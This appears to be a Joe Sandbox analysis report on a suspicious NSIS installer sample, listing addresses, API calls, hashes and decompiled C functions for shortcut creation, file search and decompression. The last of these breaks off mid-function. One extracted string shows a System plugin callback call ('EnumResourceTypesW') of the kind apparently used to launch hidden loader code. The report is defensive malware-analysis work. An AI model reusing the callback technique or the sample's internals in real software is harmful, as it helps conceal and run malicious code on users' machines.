                                                                                                                                                                                            0x004040de
                                                                                                                                                                                            0x004040e2
                                                                                                                                                                                            0x004040e7
                                                                                                                                                                                            0x004040ef
                                                                                                                                                                                            0x004040f5
                                                                                                                                                                                            0x004040f7
                                                                                                                                                                                            0x00404092
                                                                                                                                                                                            0x00404092
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404092
                                                                                                                                                                                            0x004040fa
                                                                                                                                                                                            0x00404101
                                                                                                                                                                                            0x0040410b
                                                                                                                                                                                            0x00404111
                                                                                                                                                                                            0x00404113
                                                                                                                                                                                            0x00404115
                                                                                                                                                                                            0x0040411b
                                                                                                                                                                                            0x0040411d
                                                                                                                                                                                            0x0040411e
                                                                                                                                                                                            0x00404120
                                                                                                                                                                                            0x0040412c
                                                                                                                                                                                            0x00404132
                                                                                                                                                                                            0x00404134
                                                                                                                                                                                            0x00404138
                                                                                                                                                                                            0x00404138
                                                                                                                                                                                            0x00404134
                                                                                                                                                                                            0x0040411b
                                                                                                                                                                                            0x0040413d
                                                                                                                                                                                            0x0040413d
                                                                                                                                                                                            0x0040414a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040414a
                                                                                                                                                                                            0x00404089
                                                                                                                                                                                            0x0040408c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403fef
                                                                                                                                                                                            0x00403fef
                                                                                                                                                                                            0x00404000
                                                                                                                                                                                            0x00404002
                                                                                                                                                                                            0x00404007
                                                                                                                                                                                            0x00404009
                                                                                                                                                                                            0x0040400c
                                                                                                                                                                                            0x00404011
                                                                                                                                                                                            0x00404013
                                                                                                                                                                                            0x00404016
                                                                                                                                                                                            0x00404016
                                                                                                                                                                                            0x00404013
                                                                                                                                                                                            0x0040401d
                                                                                                                                                                                            0x00404023
                                                                                                                                                                                            0x00404029
                                                                                                                                                                                            0x0040402d
                                                                                                                                                                                            0x00404030
                                                                                                                                                                                            0x00404033
                                                                                                                                                                                            0x00404038
                                                                                                                                                                                            0x0040403b
                                                                                                                                                                                            0x0040403e
                                                                                                                                                                                            0x00404044
                                                                                                                                                                                            0x0040404b
                                                                                                                                                                                            0x00404050
                                                                                                                                                                                            0x00404052
                                                                                                                                                                                            0x0040405b
                                                                                                                                                                                            0x0040405b
                                                                                                                                                                                            0x00404317
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404318
                                                                                                                                                                                            0x00403fcf
                                                                                                                                                                                            0x00403fd5
                                                                                                                                                                                            0x00403fdb
                                                                                                                                                                                            0x00404319
                                                                                                                                                                                            0x0040432c
                                                                                                                                                                                            0x0040432c

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00403FF9
                                                                                                                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 00404023
                                                                                                                                                                                              • Part of subcall function 00406835: GetDlgItemTextA.USER32(?,?,00000400,00404E3D), ref: 00406848
                                                                                                                                                                                              • Part of subcall function 00406AED: CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B54
                                                                                                                                                                                              • Part of subcall function 00406AED: CharNextA.USER32(?,?,?,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B61
                                                                                                                                                                                              • Part of subcall function 00406AED: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B66
                                                                                                                                                                                              • Part of subcall function 00406AED: CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403BE3,C:\Users\user\AppData\Local\Temp\,756D3410,004038B6), ref: 00406B7D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Char$Next$ItemText$PrevWindow
                                                                                                                                                                                            • String ID: A$Apteres Setup: Installing$C:\Users\user\AppData\Roaming\drvelens\anskrevne$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                                                                                                                                                            • API String ID: 4089110348-742308569
                                                                                                                                                                                            • Opcode ID: 0980f9641a0dd9ef616c5728edd88702b7e283e22aba97b7efe64eb69488687b
                                                                                                                                                                                            • Instruction ID: a3a3f8ea570ea1fbe13174c142412bac9ac22fb280a12495a16579a21dfb1138
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0980f9641a0dd9ef616c5728edd88702b7e283e22aba97b7efe64eb69488687b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B91E1B1604311ABD720AF658D85F6B7698AB94704F41083EFB81B62D2DB7CD8418B6E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00402300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144comCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                            			E00402300(char _a4, intOrPtr _a8, intOrPtr _a12, signed int _a36, intOrPtr _a44, signed int _a48, signed int _a52, signed int _a60, intOrPtr _a64, intOrPtr _a80) {
				signed int _v4;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr* _v36;
				intOrPtr* _v40;
				void* _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v60;
				void* _v64;
				void* _v72;
				void* _v84;
				signed int _t52;
				signed int _t55;
				unsigned int _t61;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				void* _t104;
				intOrPtr* _t106;
				signed int _t109;
				short* _t111;
				void* _t116;

				_a80 = E00402E92(_t104, 0xfffffff0);
				_t111 = E00402E92(_t104, 0xffffffdf);
				_a64 = E00402E92(_t104, 2);
				_a12 = E00402E92(_t104, 0xffffffcd);
				_a44 = E00402E92(_t104, 0x45);
				_t52 = _a36;
				_a60 = _t52 & 0x00000fff;
				_a52 = _t52 & 0x00008000;
				_t109 = _t52 >> 0x0000000c & 0x00000007;
				_a48 = _t52 >> 0x10;
				if(E00406B9E(_t111) == 0) {
					E00402E92(_t104, 0x21);
				}
				_t55 = _t116 + 0x14;
				__imp__CoCreateInstance(0x408758, _t87, 1, 0x408738, _t55);
				_v4 = _t55;
				if(_t55 >= 0) {
					_t63 =  *(_t116 + 0x14);
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408748,  &_a4);
					_v16 = _t64;
					if(_t64 >= 0) {
						_t67 =  *(_t116 + 0x14);
						_v24 =  *((intOrPtr*)( *_t67 + 0x50))(_t67, _t111);
						if( *((intOrPtr*)(_t116 + 0x48)) == _t87) {
							_t84 = _v20;
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne\\Vrvleversenes\\lsernes\\Volantly");
						}
						if(_t109 != 0) {
							_t82 = _v20;
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 = _v20;
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *((intOrPtr*)(_t116 + 0x44)));
						_t106 = _v20;
						if( *_t106 != _t87) {
							_t80 = _v28;
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t106,  *((intOrPtr*)(_t116 + 0x50)));
						}
						_t71 = _v28;
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t116 + 0x4c)));
						_t73 = _v36;
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73, _a8);
						if(_v48 >= _t87) {
							_v48 = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t116 + 0x60), 0xffffffff, _t111, 0x400) != 0) {
								_t78 = _v40;
								_v60 =  *((intOrPtr*)( *_t78 + 0x18))(_t78, _t111, 1);
							}
						}
						_t75 = _v40;
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *(_t116 + 0x14);
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					_t55 = _v20;
				}
				_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
				_push((_t55 >> 0x0000001f & 0xfffffffc) - 0xc);
				E00405BA4();
				_t61 =  *(_t116 + 0x10) >> 0x1f;
				 *0x4240c8 =  *0x4240c8 + _t61;
				return 0;
			}






































                                                                                                                                                                                            0x00402309
                                                                                                                                                                                            0x00402314
                                                                                                                                                                                            0x0040231d
                                                                                                                                                                                            0x00402328
                                                                                                                                                                                            0x00402331
                                                                                                                                                                                            0x00402335
                                                                                                                                                                                            0x00402343
                                                                                                                                                                                            0x00402356
                                                                                                                                                                                            0x0040235a
                                                                                                                                                                                            0x0040235d
                                                                                                                                                                                            0x00402368
                                                                                                                                                                                            0x0040236c
                                                                                                                                                                                            0x0040236c
                                                                                                                                                                                            0x00402371
                                                                                                                                                                                            0x00402385
                                                                                                                                                                                            0x0040238b
                                                                                                                                                                                            0x00402391
                                                                                                                                                                                            0x00402397
                                                                                                                                                                                            0x004023a8
                                                                                                                                                                                            0x004023aa
                                                                                                                                                                                            0x004023b0
                                                                                                                                                                                            0x004023b6
                                                                                                                                                                                            0x004023c1
                                                                                                                                                                                            0x004023c9
                                                                                                                                                                                            0x004023cb
                                                                                                                                                                                            0x004023d7
                                                                                                                                                                                            0x004023d7
                                                                                                                                                                                            0x004023dc
                                                                                                                                                                                            0x004023de
                                                                                                                                                                                            0x004023e6
                                                                                                                                                                                            0x004023e6
                                                                                                                                                                                            0x004023e9
                                                                                                                                                                                            0x004023f4
                                                                                                                                                                                            0x004023f7
                                                                                                                                                                                            0x004023fd
                                                                                                                                                                                            0x004023ff
                                                                                                                                                                                            0x0040240b
                                                                                                                                                                                            0x0040240b
                                                                                                                                                                                            0x0040240e
                                                                                                                                                                                            0x00402419
                                                                                                                                                                                            0x0040241c
                                                                                                                                                                                            0x00402427
                                                                                                                                                                                            0x0040242e
                                                                                                                                                                                            0x0040243c
                                                                                                                                                                                            0x0040244e
                                                                                                                                                                                            0x00402450
                                                                                                                                                                                            0x0040245c
                                                                                                                                                                                            0x0040245c
                                                                                                                                                                                            0x0040244e
                                                                                                                                                                                            0x00402460
                                                                                                                                                                                            0x00402467
                                                                                                                                                                                            0x00402467
                                                                                                                                                                                            0x0040246a
                                                                                                                                                                                            0x00402471
                                                                                                                                                                                            0x00402474
                                                                                                                                                                                            0x00402474
                                                                                                                                                                                            0x0040247e
                                                                                                                                                                                            0x00402486
                                                                                                                                                                                            0x00402487
                                                                                                                                                                                            0x00402490
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CoCreateInstance.OLE32(00408758,?,00000001,00408738,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402385
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00000000,00000400,?,00000001,00408738,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402446
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly, xrefs: 004023CF
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll, xrefs: 0040247E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll$C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly
                                                                                                                                                                                            • API String ID: 123533781-1910828502
                                                                                                                                                                                            • Opcode ID: f9f207bfe791634366329c83cf20a5860d5e48f665985288e3737c912b17de6c
                                                                                                                                                                                            • Instruction ID: 6e60790cbd178f8db9125ff4787f54a42c9af7dfa76d0de7eacdf5c5778c2886
                                                                                                                                                                                            • Opcode Fuzzy Hash: f9f207bfe791634366329c83cf20a5860d5e48f665985288e3737c912b17de6c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 46511471204301AFC700DF68C948A1BBBE9EF89304F10492EF695EB291DBB9D805CB66
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004029DA Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 46%
                                                                                                                                                                                            			E004029DA(void* __ebx, void* __edi, void* __ebp, struct _WIN32_FIND_DATAA _a140, void* _a176) {
				void* _v4;
				intOrPtr _t9;
				void* _t15;
				void* _t21;

				if(FindFirstFileA(E00402E92(_t15, 2),  &_a140) != 0xffffffff) {
					E00406408(__edi, _t5);
					_push(_t21 + 0xbc);
					_push(__ebp);
					E0040690A();
					_t9 =  *((intOrPtr*)(_t21 + 0x10));
				} else {
					 *__edi = __bl;
					 *__ebp = __bl;
					_t9 = 1;
				}
				 *0x4240c8 =  *0x4240c8 + _t9;
				return 0;
			}







                                                                                                                                                                                            0x004029f3
                                                                                                                                                                                            0x004029fe
                                                                                                                                                                                            0x004029d3
                                                                                                                                                                                            0x004029d4
                                                                                                                                                                                            0x00401cff
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x004029f5
                                                                                                                                                                                            0x004029f5
                                                                                                                                                                                            0x00402833
                                                                                                                                                                                            0x004016ef
                                                                                                                                                                                            0x004016ef
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004029EA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                                            • Opcode ID: 549a08417b382e08f2c2e3d5f654f6698e317159f2c68fb950333cda488075cd
                                                                                                                                                                                            • Instruction ID: 9226fe09b482c77fb7f901ca48f8c22e58d9492ecb6a30077d109424972cc372
                                                                                                                                                                                            • Opcode Fuzzy Hash: 549a08417b382e08f2c2e3d5f654f6698e317159f2c68fb950333cda488075cd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 01D017B1048251A9E6A0A2608A4EE7B769D9F10310F20462FB596A10D2DAB85412A27F
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406EAE Relevance: .3, Instructions: 310COMMONCrypto
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                            			E00406EAE(unsigned int __ebx, signed int __edi, void* __esi) {
				signed int _t405;
				signed int _t413;
				unsigned int _t447;
				signed short* _t451;
				signed int _t453;
				signed int _t493;
				void* _t512;

				L0:
				while(1) {
					L0:
					_t493 = __edi;
					_t447 = __ebx;
					if(__esi != 0) {
						goto L36;
					}
					L25:
					__edx =  *(__esp + 0x4c) & 0x000000ff;
					__eax = 8;
					__cl = __al;
					__eax =  *(__esp + 0x48);
					__cl = __al -  *(__esp + 0x6c);
					__eax =  *(__esp + 0x48) &  *(__esp + 0xb4);
					__edx = __edx >> __cl;
					__ecx =  *(__esp + 0x6c);
					__eax = ( *(__esp + 0x48) &  *(__esp + 0xb4)) << __cl;
					__ecx =  *(__esp + 0xa4);
					__edx = __edx + (( *(__esp + 0x48) &  *(__esp + 0xb4)) << __cl);
					__eax = __edx * 0x600;
					__ecx =  *(__esp + 0xa4) + 0xe6c;
					__eax = __edx * 0x600 +  *(__esp + 0xa4) + 0xe6c;
					 *(__esp + 0x50) = __edx * 0x600 +  *(__esp + 0xa4) + 0xe6c;
					__eax =  *(__esp + 0x70);
					if(__eax >= 4) {
						if(__eax >= 0xa) {
							__eax = __eax - 6;
						} else {
							__eax = __eax - 3;
						}
						 *(__esp + 0x70) = __eax;
					} else {
						 *(__esp + 0x70) =  *(__esp + 0x70) & __esi;
					}
					if( *(__esp + 0x74) == 0) {
						L35:
						__ebp = 0;
						__ebp = 1;
						goto L60;
					} else {
						L32:
						__eax =  *(__esp + 0x94);
						__eax =  *(__esp + 0x94) -  *(__esp + 0x14);
						__ecx =  *(__esp + 0x34);
						if(__eax >= __ecx) {
							__eax = __eax + __ecx;
						}
						__ecx =  *(__esp + 0xa0);
						__ebp = 0;
						__ebp = 1;
						__al =  *((intOrPtr*)(__eax +  *(__esp + 0xa0)));
						L43:
						__edx =  *(__esp + 0x50);
						__ecx = __al & 0x000000ff;
						__al = __al + __al;
						__ecx = __ecx >> 7;
						 *(__esp + 0x1b) = __al;
						 *(__esp + 0x4d) = __al;
						 *(__esp + 0x10) = __ecx;
						__eax = __ecx + 1;
						 *(__esp + 0x60) = __ecx;
						__ecx + 1 << 8 = (__ecx + 1 << 8) + __ebp;
						__edx =  *(__esp + 0x50) + ((__ecx + 1 << 8) + __ebp) * 2;
						__eax =  *__edx & 0x0000ffff;
						__esi = __ax & 0x0000ffff;
						 *(__esp + 0x1c) =  *__edx & 0x0000ffff;
						__ebx = __ebx >> 0xb;
						__eax = (__ebx >> 0xb) * __esi;
						 *(__esp + 0xa8) = __esi;
						__esi = 0;
						 *(__esp + 0x54) = __edx;
						if(__edi >= __eax) {
							__edi = __edi - __eax;
							__ebp = 1 + __ebp * 2;
							__ebx = __ebx - __eax;
							 *(__esp + 0x9c) = __edi;
							__ax =  *(__esp + 0x1c);
							__esi = 1;
							__ax =  *(__esp + 0x1c) >> 5;
							 *(__esp + 0x1c) =  *(__esp + 0x1c) - __ax;
							__eax =  *(__esp + 0x1c);
						} else {
							__ebx = __eax;
							0x800 = 0x800 -  *(__esp + 0xa8);
							0x800 -  *(__esp + 0xa8) >> 5 = (0x800 -  *(__esp + 0xa8) >> 5) +  *(__esp + 0x1c);
							__ebp = __ebp + __ebp;
						}
						 *(__esp + 0x64) = __ebp;
						 *__edx = __ax;
						 *(__esp + 0x98) = __ebx;
						 *(__esp + 0x68) = __esi;
						if(__ebx >= 0x1000000) {
							L40:
							if(__ecx != __esi) {
								goto L50;
							} else {
								L41:
								if(__ebp >= 0x100) {
									L56:
									__al =  *(__esp + 0x64);
									 *(__esp + 0x74) =  *(__esp + 0x74) & 0x00000000;
									 *(__esp + 0x4c) = __al;
									L67:
									__edx =  *(__esp + 0x44);
									if(__edx == 0) {
										L165:
										 *(__esp + 0x20) = 0x1a;
										goto L173;
									} else {
										L68:
										__ecx =  *(__esp + 0x40);
										 *(__esp + 0x48) =  *(__esp + 0x48) + 1;
										 *__ecx = __al;
										__ecx = __ecx + 1;
										__edx = __edx - 1;
										 *(__esp + 0x40) = __ecx;
										__ecx =  *(__esp + 0x94);
										 *(__esp + 0x44) = __edx;
										__edx =  *(__esp + 0xa0);
										 *(__ecx +  *(__esp + 0xa0)) = __al;
										__eax = __ecx;
										__eax = __ecx + 1;
										__ecx =  *(__esp + 0x10);
										__edx = 0;
										_t167 = __eax %  *(__esp + 0x34);
										__eax = __eax /  *(__esp + 0x34);
										__edx = _t167;
										 *(__esp + 0x94) = __edx;
										L128:
										__eax = 2;
										L83:
										 *(_t512 + 0x20) = _t405;
										L1:
										while(_t405 <= 0x1c) {
											switch( *((intOrPtr*)(_t405 * 4 +  &M0040798E))) {
												case 0:
													L3:
													_t414 =  *((intOrPtr*)(_t512 + 0x3c));
													if(_t414 == 0) {
														goto L173;
													} else {
														L4:
														 *((intOrPtr*)(_t512 + 0x3c)) = _t414 - 1;
														_t417 =  *(_t512 + 0x38);
														_t455 =  *_t417;
														_t405 = _t417 + 1;
														 *(_t512 + 0x38) = _t405;
														if(_t455 > 0xe1) {
															goto L174;
														} else {
															L5:
															_t418 = _t455 & 0x000000ff;
															_push(0x2d);
															_pop(_t456);
															_push(9);
															_t506 = _t418 / _t456;
															_t420 = _t418 % _t456 & 0x000000ff;
															_pop(_t457);
															 *(_t512 + 0x6c) = _t420 % _t457 & 0x000000ff;
															 *(_t512 + 0xb0) = 1;
															 *((intOrPtr*)(_t512 + 0x8c)) = (1 << _t506) - 1;
															 *((intOrPtr*)(_t512 + 0xb4)) = 1;
															 *((intOrPtr*)(_t512 + 0x90)) = (1 << _t420 / _t457) - 1;
															_t463 =  *(_t512 + 0xa4);
															_t509 = (0x300 <<  *(_t512 + 0x6c) + _t506) + 0x736;
															_t422 = 0x600;
															if(0x600 ==  *((intOrPtr*)(_t512 + 0x30))) {
																L10:
																_t509 = _t509 - 1;
																 *((short*)(_t463 + _t509 * 2)) = 0x400;
															} else {
																L6:
																if(_t463 != 0) {
																	GlobalFree(_t463);
																	_t422 = 0x600;
																}
																_t405 = GlobalAlloc(0x40, _t422); // executed
																_t463 = _t405;
																 *(_t512 + 0xa4) = _t463;
																if(_t463 == 0) {
																	goto L174;
																} else {
																	L9:
																	 *((intOrPtr*)(_t512 + 0x30)) = _t509 + _t509;
																	do {
																		goto L10;
																	} while (_t509 != 0);
																	_t464 = 0;
																	_t510 = 0;
																	goto L14;
																}
															}
														}
													}
													goto L175;
												case 1:
													L12:
													_t424 =  *((intOrPtr*)(_t512 + 0x3c));
													if(_t424 == 0) {
														L160:
														 *(_t512 + 0x20) = 1;
														goto L173;
													} else {
														L13:
														_t489 =  *(_t512 + 0x38);
														 *((intOrPtr*)(_t512 + 0x3c)) = _t424 - 1;
														_t510 = _t510 | ( *_t489 & 0x000000ff) << _t464 << 0x00000003;
														_t464 =  *(_t512 + 0x10) + 1;
														 *(_t512 + 0x38) =  &(_t489[1]);
														L14:
														 *(_t512 + 0x60) = _t464;
														 *(_t512 + 0x10) = _t464;
														 *(_t512 + 0x68) = _t510;
														if(_t464 < 4) {
															goto L12;
														} else {
															L15:
															_t428 =  *(_t512 + 0x34);
															if(_t510 == _t428) {
																L20:
																_push(5);
																 *((char*)( *(_t512 + 0xa0) + _t428 - 1)) = 0;
																_pop(_t468);
																goto L23;
															} else {
																L16:
																_t436 =  *(_t512 + 0xa0);
																 *(_t512 + 0x34) = _t510;
																if(_t436 != 0) {
																	GlobalFree(_t436);
																}
																_t405 = GlobalAlloc(0x40, _t510); // executed
																 *(_t512 + 0xa0) = _t405;
																if(_t405 == 0) {
																	goto L174;
																} else {
																	L19:
																	_t428 =  *(_t512 + 0x34);
																	goto L20;
																}
															}
														}
													}
													goto L175;
												case 2:
													L24:
													_t470 =  *(_t512 + 0x48) &  *(_t512 + 0xb0);
													 *(_t512 + 0xac) = _t470;
													 *(_t512 + 0x5c) = _t470;
													 *(_t512 + 0x24) = 6;
													_t451 =  *(_t512 + 0xa4) + (( *(_t512 + 0x70) << 4) + _t470) * 2;
													 *(_t512 + 0x54) = _t451;
													goto L136;
												case 3:
													L21:
													_t430 =  *((intOrPtr*)(_t512 + 0x3c));
													if(_t430 == 0) {
														L161:
														 *(_t512 + 0x20) = 3;
														goto L173;
													} else {
														L22:
														_t491 =  *(_t512 + 0x38);
														 *((intOrPtr*)(_t512 + 0x3c)) = _t430 - 1;
														_t493 = _t493 << 0x00000008 |  *_t491 & 0x000000ff;
														 *(_t512 + 0x9c) = _t493;
														 *(_t512 + 0x38) =  &(_t491[1]);
														L23:
														_t429 = _t468;
														_t468 = _t468 - 1;
														 *(_t512 + 0x10) = _t468;
														 *(_t512 + 0x60) = _t468;
														if(_t429 != 0) {
															goto L21;
														} else {
															goto L24;
														}
													}
													goto L175;
												case 4:
													L135:
													__ecx =  *(__esp + 0x54);
													goto L136;
												case 5:
													L140:
													_t440 =  *((intOrPtr*)(_t512 + 0x3c));
													if(_t440 == 0) {
														L171:
														 *(_t512 + 0x20) = 5;
														goto L173;
													} else {
														L141:
														_t472 =  *(_t512 + 0x38);
														_t447 = _t447 << 8;
														 *((intOrPtr*)(_t512 + 0x3c)) = _t440 - 1;
														_t493 = _t493 << 0x00000008 |  *_t472 & 0x000000ff;
														 *(_t512 + 0x98) = _t447;
														 *(_t512 + 0x9c) = _t493;
														 *(_t512 + 0x38) =  &(_t472[1]);
														goto L142;
													}
													goto L175;
												case 6:
													goto L0;
												case 7:
													L69:
													if(__esi != 1) {
														L71:
														__eax =  *(__esp + 0x84);
														__ecx =  *(__esp + 0x80);
														 *(__esp + 0x88) =  *(__esp + 0x84);
														_push(0xa);
														_pop(__eax);
														_push(7);
														 *(__esp + 0x88) = __ecx;
														_pop(__ecx);
														 *(__esp + 0x80) = __edx;
														__eax =  <  ? __ecx : __eax;
														 *(__esp + 0x28) = 0x16;
														 *(__esp + 0x70) = __eax;
														__eax =  *(__esp + 0xa4);
														__eax =  *(__esp + 0xa4) + 0x664;
														 *(__esp + 0x50) = __eax;
														goto L130;
													} else {
														L70:
														__eax =  *(__esp + 0x70);
														__ecx =  *(__esp + 0xa4);
														_push(8);
														__ecx = __ecx + __eax * 2;
														__ecx = __ecx + 0x198;
														goto L37;
													}
													goto L136;
												case 8:
													L72:
													__eax =  *(__esp + 0x70);
													__ecx =  *(__esp + 0xa4);
													if(__esi != 0) {
														L74:
														__ecx = __ecx + __eax * 2;
														 *((intOrPtr*)(__esp + 0x24)) = 0xa;
														__ecx = __ecx + 0x1b0;
														 *(__esp + 0x54) = __ecx;
													} else {
														L73:
														__eax = __eax + 0xf;
														__eax = __eax << 4;
														__eax = __eax +  *(__esp + 0xac);
														_push(9);
														__ecx = __ecx + __eax * 2;
														L37:
														_pop(_t407);
														 *(_t512 + 0x54) = _t451;
														 *(_t512 + 0x24) = _t407;
													}
													goto L136;
												case 9:
													L75:
													if(__esi != 0) {
														goto L92;
													} else {
														L76:
														if( *(__esp + 0x48) == __esi) {
